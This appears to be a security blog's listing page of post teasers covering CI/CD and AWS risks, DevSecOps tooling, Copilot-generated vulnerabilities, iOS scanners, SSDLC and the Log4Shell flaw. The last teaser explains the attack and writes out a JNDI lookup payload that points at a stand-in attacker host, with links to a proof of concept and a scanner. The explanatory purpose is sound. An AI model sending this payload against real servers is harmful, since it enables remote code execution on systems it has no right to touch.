In the evolving landscape of cloud computing, AWS (Amazon Web Services) stands out as a leading service provider. However, as with any digital frontier, it is not without its potential vulnerabilities. One of the emerging threats faced by organizations today is CI/CD Security. In this short blog post I will show how the AWS Account Hijacking can be done via CI/CD. IAM Configuration Workflow

Link: https://cdn.openai.com/papers/gpt-4.pdf Changes in short: Context doubled (x8) Keeping training secret “Given both the competitive landscape and the safety implications of large-scale models like GPT-4, this report contains no further details about the architecture (including model size), hardware, training compute, dataset construction, training method, or similar.” 3. Performance improvement (better marks in well-known…

Do you still remember when it took a long time to implement Security controls into your workflow? Let’s do it in 5 minutes with JIT.io — a modern DevSecOps Orchestration Platform! Let imagine the following workflow The list of Security Controls that will be added: Detecting secrets tool Static application…

GitHub Copilot is an interesting solution that promises to simplify the developer’s day-to-day tasks. This short article aims to answer the question: Could GitHub Copilot produce a vulnerable code? Could GitHub Copilot produce some sensitive information that may be real? …

Search engines doing really great job in indexing content. Of course everyone wants to be at the top of the search results. But sometimes it can lead to security issues. In this short article we will give a few examples and describe how you can fix the indexing problem. Note…

In this article, I tried to overview: What iOS Apps Security Scanners exist on the market, What capabilities they provide, and what vulnerabilities they can discover. Given that new solutions and vulnerable applications often appear on the market, this article will be updated further. …

In this short article, I tried to overview what Security Controls exists, what stage it can be added to the CI/CD process, and what benefits we receive. In simple words, DevSecOps is about adding different security controls at every step of your CI/CD process. …

The main purpose: CyberSecurity should help businesses succeed. Structure: 1. Main goal of Secure Software Development Life Cycle (SSDLC) 2. Controls that can be implemented on different stages of the Secure Software Development Life Cycle 3. What methods are the most effective in identifying vulnerabilities based on OWASP rating 4. Example of potential implementation…

How it’s work: We send a specially formed request like $ {jndi: ldap: //attacker.host/blabla} to any place that can potentially be logged. JNDI (Java Naming and Directory Interface), in turn, processes the template, requests data via LDAP from attacker.host In the response, a JAVA class is given, which allows you to execute arbitrary code. PoC: https://github.com/tangxiaofeng7/apache-log4j-poc Log4j2 RCE BurpSuite Plugin: https://github.com/whwlsfb/Log4j2Scan